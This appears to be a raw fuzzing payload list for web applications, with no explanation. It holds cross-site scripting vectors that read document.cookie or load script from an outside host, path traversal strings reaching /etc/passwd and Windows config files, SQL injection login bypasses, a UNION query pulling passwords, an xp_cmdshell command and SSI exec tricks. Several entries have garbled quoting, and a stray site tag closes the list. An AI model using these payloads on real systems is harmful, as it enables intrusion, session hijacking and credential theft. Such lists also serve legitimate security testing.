"><script>alert(document.cookie)</script>
="><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
%3Cscript%3Ealert("XSS")%3C/script%3E
<script>alert("XSS")</script>
<img src="javascript:alert("XSS")">
%0a%0a<script>alert("Vulnerable")</script>.jsp
%22%3cscript%3ealert(%22xss%22)%3c/script%3e
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini
%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html
%3f.jsp
%3f.jsp
<script>alert("Vulnerable");</script>
<script>alert("Vulnerable")</script>
?sql_debug=1
a%5c.aspx
a.jsp/<script>alert("Vulnerable")</script>
a/
a?<script>alert("Vulnerable")</script>
"><script>alert("Vulnerable")</script>
";exec%20master..xp_cmdshell%20"dir%20 c:%20>%20c:inetpubwwwroot?.txt"--&&
%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
%3Cscript%3Ealert(document. domain);%3C/script%3E&
%3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=
1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=
../../../../../../../../etc/passwd
................windowssystem.ini
................windowssystem.ini
"";!--"<XSS>=&{()}
<IMG SRC="javascript:alert("XSS");">
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=JaVaScRiPt:alert("XSS")>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert('XSS')>
<IMG SRC="jav ascript:alert("XSS");">
<IMG SRC="jav
ascript:alert("XSS");">
<IMG SRC="jav
ascript:alert("XSS");">
"<IMG SRC=java�script:alert("XSS")>";" > out
<IMG SRC=" javascript:alert("XSS");">
<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
<BODY BACKGROUND="javascript:alert("XSS")">
<BODY ONLOAD=alert("XSS")>
<IMG DYNSRC="javascript:alert("XSS")">
<IMG LOWSRC="javascript:alert("XSS")">
<BGSOUND SRC="javascript:alert("XSS");">
<br size="&{alert("XSS")}">
<LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>
<LINK REL="stylesheet" HREF="javascript:alert("XSS");">
<IMG SRC="vbscript:msgbox("XSS")">
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert("XSS");">
<IFRAME SRC=javascript:alert("XSS")></IFRAME>
<FRAMESET><FRAME SRC=javascript:alert("XSS")></FRAME></FRAMESET>
<TABLE BACKGROUND="javascript:alert("XSS")">
<DIV STYLE="background-image: url(javascript:alert("XSS"))">
<DIV STYLE="behaviour: url("http://www.how-to-hack.org/exploit.html');">
<DIV STYLE="width: expression(alert("XSS"));">
<STYLE>@import"javasc
ipt:alert("XSS")";</STYLE>
<IMG STYLE="xss:expression(alert("XSS"))">
<STYLE TYPE="text/javascript">alert("XSS");</STYLE>
<STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert("XSS")");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert("XSS")")}</STYLE>
<BASE HREF="javascript:alert("XSS");//">
getURL("javascript:alert("XSS")")
a="get";b="URL";c="javascript:";d="alert("XSS");";eval(a+b+c+d);
<XML SRC="javascript:alert("XSS");">
"> <BODY ONLOAD="a();"><SCRIPT>function a(){alert("XSS");}</SCRIPT><"
<SCRIPT SRC="http://xss.ha.ckers.org/xss.jpg"></SCRIPT>
<IMG SRC="javascript:alert("XSS")"
<!--#exec cmd="/bin/echo "<SCRIPT SRC""--><!--#exec cmd="/bin/echo "=http://xss.ha.ckers.org/a.js></SCRIPT>""-->
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<SCRIPT a=">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT =">" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT a=">" "" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT "a=">"" SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<A HREF=http://www.gohttp://www.google.com/ogle.com/>link</A>
admin"--
" or 0=0 --
" or 0=0 --
or 0=0 --
" or 0=0 #
" or 0=0 #
or 0=0 #
" or "x"="x
" or "x"="x
") or ("x"="x
" or 1=1--
" or 1=1--
or 1=1--
" or a=a--
" or "a"="a
") or ("a"="a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi" or 1=1 --
hi" or "a"="a
hi") or ("a"="a
hi") or ("a"="a
易网时代-编程资源站